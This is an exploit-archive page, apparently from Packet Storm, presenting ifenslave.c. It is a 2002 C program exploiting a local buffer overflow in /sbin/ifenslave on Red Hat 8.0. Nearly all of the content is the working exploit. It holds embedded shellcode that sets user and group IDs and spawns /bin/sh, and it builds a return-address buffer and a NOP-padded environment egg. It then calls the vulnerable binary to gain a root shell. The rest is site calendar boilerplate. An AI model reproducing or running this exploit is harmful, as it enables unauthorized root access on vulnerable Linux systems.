what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ifenslave.c

ifenslave.c
Posted Dec 24, 2002
Authored by v1pee//nerf | Site nerf.ru

Local /sbin/ifenslave buffer overflow exploit tested on Redhat 8.0.

tags | exploit, overflow, local
systems | linux, redhat
SHA-256 | b9e0e10a7a2ea847f5bc55ae0e24a42b4e1a28d15afff1711fff91baa314f29d

ifenslave.c

Change Mirror Download
/*
* lame local /sbin/ifenslave buffer overrun exploit
* tested on redhat 8.0
* by v1pee//nerf, nerf.ru
* v1pee@ngs.ru
*/

#include <unistd.h>

char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

long getsp() {
__asm__("movl %esp,%eax");
}

int
main(int argc, char *argv[]) {

char *buffer, *shity, *ptr;
long *addr_ptr, addr;
int i, offset=0;
int bufsize=128;
int eggsize=512;

if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) eggsize = atoi(argv[2]);

buffer = malloc(bufsize);
shity = malloc(eggsize);

addr = getsp() - offset;
printf("local /sbin/ifenslave exploit (red hat 8.0)\n");
printf("RET: 0x%x\nOffset: %d\n", addr,offset);
ptr = buffer;

addr_ptr = (long *) ptr;

// fills rets
for (i = 0; i < bufsize; i+=4)
*(addr_ptr++) = addr;

ptr = shity;

// fills NOP instructions in
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = 0x41;

// fills shellcode
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

setenv("EGG",shity,4); // consists of nops and shellcode
setenv("XXX",buffer,4); // consists of addrs to new envp

system("/sbin/ifenslave -a $XXX");
}


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close